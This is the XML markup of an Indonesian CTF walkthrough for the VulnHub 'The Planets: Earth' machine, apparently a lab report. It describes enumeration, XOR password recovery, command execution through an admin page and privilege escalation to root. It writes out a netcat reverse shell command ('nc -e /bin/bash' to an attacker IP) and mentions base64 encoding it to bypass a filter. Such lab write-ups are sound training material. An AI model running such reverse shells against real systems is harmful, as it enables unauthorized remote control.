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CTF THE PLANETS: EARTH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Vulnerable machine: The Planets: Earth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instrText xml:space="preserve"> HYPERLINK "https://www.vulnhub.com/entry/the-planets-earth,755/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://www.vulnhub.com/entry/the-planets-earth,755/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end"/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89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6110605" cy="3131185"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="Picture 1" descr="arsitektur si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rsitektur siste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Menemukan IP Target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melakukan scanning network dengan nmap untuk menemukan IP target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57150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5124450" cy="1657350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2" name="Picture 2" descr="et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eth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Menemukan port yang terbuka pada server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116205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5706745" cy="3272790"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3810"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="Picture 4" descr="et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eth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674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-dari hasil scanning diatas ditemukan 2 buah domain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5734050" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5" name="Picture 5" descr="et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eth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Menambahkan DNS pada file /etc/hosts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-buka file /etc/hosts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2286000" cy="476250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="6" name="Picture 6" descr="et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eth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-tambahkan IP server dan nama domain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80010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4443095" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8" name="Picture 8" descr="et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eth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Membuka halaman website lewat browser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-membuka halaman http://earth.local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6109335" cy="2949575"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="9" name="Picture 9" descr="et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eth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-pada halaman http://earth.local ditemukan form untuk mengirim pesan, lalu kita coba isi form tersebut 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127635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4105275" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="10" name="Picture 10" descr="et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eth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-setelah dikirim terdapat pesan terenkripsi baru di halaman yang sama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137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4343400" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11" name="Picture 11" descr="et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eth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-tidak ditemukan apapun di halaman http://earth.local, gunakan gobuster untuk melihat ada halaman apa saja di dalam http://earth.local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108585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6048375" cy="3581400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="12" name="Picture 12" descr="et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eth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-dari hasil brute force gobuster terdapat halaman http://earth.local/admin, sekarang kita coba buka halaman tersebut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108585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6116320" cy="998855"/>
            <wp:effectExtent l="0" t="0" r="17780" b="10795"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="13" name="Picture 13" descr="et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eth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-jika diklik login maka akan diarahkan ke halaman login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118110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115685" cy="1624965"/>
            <wp:effectExtent l="0" t="0" r="18415" b="13335"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="14" name="Picture 14" descr="et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eth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-sekarang kita coba halaman https://terratest.earth.local, namun tidak ditemukan informasi apapun disini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116955" cy="598170"/>
            <wp:effectExtent l="0" t="0" r="17145" b="11430"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="15" name="Picture 15" descr="et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eth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-gunakan gobuster untuk melihat ada halaman apa saja pada https://terratest.earth.local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127635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4606925" cy="3155950"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="16" name="Picture 16" descr="et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eth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-dari hasil brute force gobuster terdapat file robots.txt pada https://terratest.earth.local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111240" cy="2901950"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="17" name="Picture 17" descr="et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eth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-pada file robots.txt ditemukan file testingnotes.txt, pada file ini diketahui username admin adalah terra kemudian langkah-langkah untuk menemukan password dari admin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118110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115685" cy="1250315"/>
            <wp:effectExtent l="0" t="0" r="18415" b="6985"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18" name="Picture 18" descr="et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eth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Menemukan password dengan tool cyber chef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-download aplikasi cyber chef di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instrText xml:space="preserve"> HYPERLINK "https://gchq.github.io/CyberChef/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://gchq.github.io/CyberChef/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end"/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6115050" cy="1083310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="19" name="Picture 19" descr="et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eth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-extract dan buka file CyberChef_v9.55.0.html lewat browser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137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6108700" cy="1394460"/>
            <wp:effectExtent l="0" t="0" r="6350" b="15240"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="20" name="Picture 20" descr="et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eth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0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6110605" cy="2668270"/>
            <wp:effectExtent l="0" t="0" r="4445" b="17780"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="21" name="Picture 21" descr="et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eth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-pilih From Hex di menu Operations dan tarik ke menu recipe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127635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5569585" cy="4240530"/>
            <wp:effectExtent l="0" t="0" r="12065" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="22" name="Picture 22" descr="et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eth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-ketik xor di filed pencarian Operations kemudian pilih XOR dan tarik ke menu recipe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146685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5118100" cy="3859530"/>
            <wp:effectExtent l="0" t="0" r="6350" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="23" name="Picture 23" descr="et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eth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-buka testdata.txt dan copy semua isi file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6115050" cy="689610"/>
            <wp:effectExtent l="0" t="0" r="0" b="15240"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="24" name="Picture 24" descr="et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eth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-Paste isi file testdata.txt pada dikolom key XOR dan set karakter menjadi UTF8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121920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2834640" cy="3373120"/>
            <wp:effectExtent l="0" t="0" r="3810" b="17780"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="25" name="Picture 25" descr="et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eth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-Copy satu persatu kode hexa pada halaman http://earth.local sebagai input di Cyber Chef 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99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115050" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="26" name="Picture 26" descr="et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eth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-percobaan pada kode hexa pertama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115050" cy="2323465"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="27" name="Picture 27" descr="et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eth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-percobaan pada kode hexa kedua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99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115050" cy="2323465"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="28" name="Picture 28" descr="et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eth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-pada percobaan kode hexa ketiga ditemukan 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6115050" cy="2650490"/>
            <wp:effectExtent l="0" t="0" r="0" b="16510"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="29" name="Picture 29" descr="et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eth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Login ke halaman admin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-melakukan login ke halaman admin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118225" cy="1703070"/>
            <wp:effectExtent l="0" t="0" r="15875" b="11430"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="30" name="Picture 30" descr="et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eth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-pada halaman admin terdapat form untuk menjalankan perintah terminal pada server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127635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6113145" cy="1748155"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="31" name="Picture 31" descr="et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eth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-melihat isi directory saat ini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89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6118225" cy="1773555"/>
            <wp:effectExtent l="0" t="0" r="15875" b="17145"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="32" name="Picture 32" descr="et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eth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-melihat isi directory pada directory /var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89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115050" cy="1445895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="33" name="Picture 33" descr="et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eth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-melihat isi directory pada directory /var/earth_web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80010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6118225" cy="1735455"/>
            <wp:effectExtent l="0" t="0" r="15875" b="17145"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="34" name="Picture 34" descr="et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eth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-membaca isi file isi file user_flag.txt dengan perintah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /var/earth_web/user_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US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3145" cy="1751330"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1270"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="35" name="Picture 35" descr="et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eth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Courier New" w:hAnsi="Courier New" w:cs="Courier New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Membuat reverse shell melalui halaman admin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-cek IP pada kali linux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57150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6029325" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="36" name="Picture 36" descr="et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eth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-buat listener netcat di port 4444 lewat terminal baru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80010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2381250" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="37" name="Picture 37" descr="et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eth 5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-jalankan perintah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -e /bin/bash 192.168.100.5 4444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namun perintahnya terbatas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87630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6112510" cy="1946275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="15875"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="38" name="Picture 38" descr="et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eth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-encode perintah sebelumnya menjadi base64 lewat terminal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4286250" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="39" name="Picture 39" descr="et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eth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-ubah perintah sebelumnya menjadi seperti berikut ini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5810250" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="40" name="Picture 40" descr="et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eth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-jalankan perintah tersebut di halaman admin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118225" cy="1787525"/>
            <wp:effectExtent l="0" t="0" r="15875" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="41" name="Picture 41" descr="eth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eth 5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-netcat berhasil terkoneksi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5048250" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="42" name="Picture 42" descr="et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eth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Melakukan privilege escalation terhadap server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-ubah shell netcat menjadi interactive terminal dengan phyton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4991100" cy="1476375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43" name="Picture 43" descr="et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eth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-mencari file di root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118110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3071495" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="45" name="Picture 45" descr="et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eth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7149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-melihat type file /usr/bin/reset_root dan ternyata adalah file executable, jadi tinggal jalankan file tersebut. Namun setelah jalankan muncul error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118110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6118225" cy="1607820"/>
            <wp:effectExtent l="0" t="0" r="15875" b="11430"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="46" name="Picture 46" descr="et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eth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-buat listener netcat di port 3333 di terminal berbeda untuk menerima file reset_root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89535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2543175" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="47" name="Picture 47" descr="et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eth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-kirim file reset_root via netcat port 3333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70485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5057775" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="48" name="Picture 48" descr="et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eth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-setelah file berhasil diterima tambahkan akses eksekusi pada file tersebut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99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5048250" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="49" name="Picture 49" descr="et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eth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-lakukan trace pada file reset_root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99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5981700" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="50" name="Picture 50" descr="et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eth 4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-buat 3 buah file sesuai baris yang tertera di trace file reset_root dan jalankan kembali file reset_root. Password root berhasil diubah menjadi ‘Earth’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118110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4905375" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="51" name="Picture 51" descr="eth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eth 4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-Switch ke user root dengan password yang baru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99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1751330" cy="1181735"/>
            <wp:effectExtent l="0" t="0" r="1270" b="18415"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="52" name="Picture 52" descr="eth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eth 4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5133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-1876425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>169545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3564890" cy="2658110"/>
            <wp:effectExtent l="0" t="0" r="16510" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="53" name="Picture 53" descr="eth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eth 4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534025" cy="4581525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="54" name="Picture 54" descr="eth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eth 4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System Requirement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OPNsense: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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OPNsense 23.1-amd64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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FreeBSD 13.1-RELEASE-p5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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OpenSSL 1.1.1s 1 Nov 2022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Kali Linux: 2022.4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sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134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0C8FEB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="920C8FEB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062"/>
    <w:rsid w:val="006D2062"/>
    <w:rsid w:val="046868C6"/>
    <w:rsid w:val="06186B09"/>
    <w:rsid w:val="06362957"/>
    <w:rsid w:val="07FB728D"/>
    <w:rsid w:val="081E0EF0"/>
    <w:rsid w:val="088D4AD3"/>
    <w:rsid w:val="08E63702"/>
    <w:rsid w:val="0BD05A5C"/>
    <w:rsid w:val="0BFA59D8"/>
    <w:rsid w:val="0C6B3541"/>
    <w:rsid w:val="0CD65929"/>
    <w:rsid w:val="0EA92B4B"/>
    <w:rsid w:val="0F372683"/>
    <w:rsid w:val="10083B94"/>
    <w:rsid w:val="1233782D"/>
    <w:rsid w:val="149E1F08"/>
    <w:rsid w:val="16BE79E6"/>
    <w:rsid w:val="191D292A"/>
    <w:rsid w:val="19EB6AB8"/>
    <w:rsid w:val="19FE6A0F"/>
    <w:rsid w:val="1BD706E7"/>
    <w:rsid w:val="1CAA497B"/>
    <w:rsid w:val="1D1379F5"/>
    <w:rsid w:val="1D3E6495"/>
    <w:rsid w:val="1D5D4E01"/>
    <w:rsid w:val="1FAC0870"/>
    <w:rsid w:val="205C6EE0"/>
    <w:rsid w:val="214C29D7"/>
    <w:rsid w:val="223A39BB"/>
    <w:rsid w:val="22FC2D6F"/>
    <w:rsid w:val="231852A8"/>
    <w:rsid w:val="23295190"/>
    <w:rsid w:val="24EB245F"/>
    <w:rsid w:val="26236C2B"/>
    <w:rsid w:val="267C5E12"/>
    <w:rsid w:val="288312CC"/>
    <w:rsid w:val="2A53118E"/>
    <w:rsid w:val="2B906BA4"/>
    <w:rsid w:val="2BD97176"/>
    <w:rsid w:val="2CC558F3"/>
    <w:rsid w:val="2D2954FC"/>
    <w:rsid w:val="2D44002B"/>
    <w:rsid w:val="2E0E14C7"/>
    <w:rsid w:val="2FCA1AD2"/>
    <w:rsid w:val="301D3210"/>
    <w:rsid w:val="3085257A"/>
    <w:rsid w:val="35C26A23"/>
    <w:rsid w:val="37767F24"/>
    <w:rsid w:val="38D55016"/>
    <w:rsid w:val="3AF746F2"/>
    <w:rsid w:val="3B6D12A5"/>
    <w:rsid w:val="3B8035D6"/>
    <w:rsid w:val="3C0628F3"/>
    <w:rsid w:val="3E046D72"/>
    <w:rsid w:val="3ED263A0"/>
    <w:rsid w:val="40166A05"/>
    <w:rsid w:val="425471D9"/>
    <w:rsid w:val="440F02E6"/>
    <w:rsid w:val="45AD4C20"/>
    <w:rsid w:val="46491CF5"/>
    <w:rsid w:val="477549CB"/>
    <w:rsid w:val="486B3E26"/>
    <w:rsid w:val="48F0161B"/>
    <w:rsid w:val="4975568D"/>
    <w:rsid w:val="4AF23A09"/>
    <w:rsid w:val="4C9D39D2"/>
    <w:rsid w:val="4DA349FD"/>
    <w:rsid w:val="4E6A0158"/>
    <w:rsid w:val="4E6B4DD4"/>
    <w:rsid w:val="4FDD669C"/>
    <w:rsid w:val="52435BC7"/>
    <w:rsid w:val="52D75CB2"/>
    <w:rsid w:val="53E321FC"/>
    <w:rsid w:val="54497359"/>
    <w:rsid w:val="56BA5FF4"/>
    <w:rsid w:val="59754FF2"/>
    <w:rsid w:val="598F0C75"/>
    <w:rsid w:val="5A0B34B0"/>
    <w:rsid w:val="5A293026"/>
    <w:rsid w:val="5A6D29E2"/>
    <w:rsid w:val="5AC01B25"/>
    <w:rsid w:val="5B7B722A"/>
    <w:rsid w:val="5BF13C04"/>
    <w:rsid w:val="5C750737"/>
    <w:rsid w:val="5CAF0B5F"/>
    <w:rsid w:val="5CDA59C5"/>
    <w:rsid w:val="5DAC24C7"/>
    <w:rsid w:val="5DCF2180"/>
    <w:rsid w:val="60CD3F0D"/>
    <w:rsid w:val="6125703B"/>
    <w:rsid w:val="61D31C61"/>
    <w:rsid w:val="63A76991"/>
    <w:rsid w:val="65D83539"/>
    <w:rsid w:val="66405B2C"/>
    <w:rsid w:val="66E606DC"/>
    <w:rsid w:val="67D72080"/>
    <w:rsid w:val="68D86130"/>
    <w:rsid w:val="69B14C99"/>
    <w:rsid w:val="6B5B1A76"/>
    <w:rsid w:val="6E7F49AE"/>
    <w:rsid w:val="712E746E"/>
    <w:rsid w:val="737173C9"/>
    <w:rsid w:val="767B10E4"/>
    <w:rsid w:val="76AA3A4C"/>
    <w:rsid w:val="7707115E"/>
    <w:rsid w:val="79F16073"/>
    <w:rsid w:val="7BBA171B"/>
    <w:rsid w:val="7E1D7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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml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326</Words>
  <Characters>2156</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2444</CharactersWithSpaces>
  <Application>WPS Office_11.2.0.8668_F1E327BC-269C-435d-A152-05C5408002CA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2023-02-28T07:03:00Z</dcterms:created>
  <dc:creator>radian</dc:creator>
  <cp:lastModifiedBy>radian</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-28T13:15:57Z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1033-11.2.0.8668</vt:lpwstr>
  </property>
</Properties>
</file>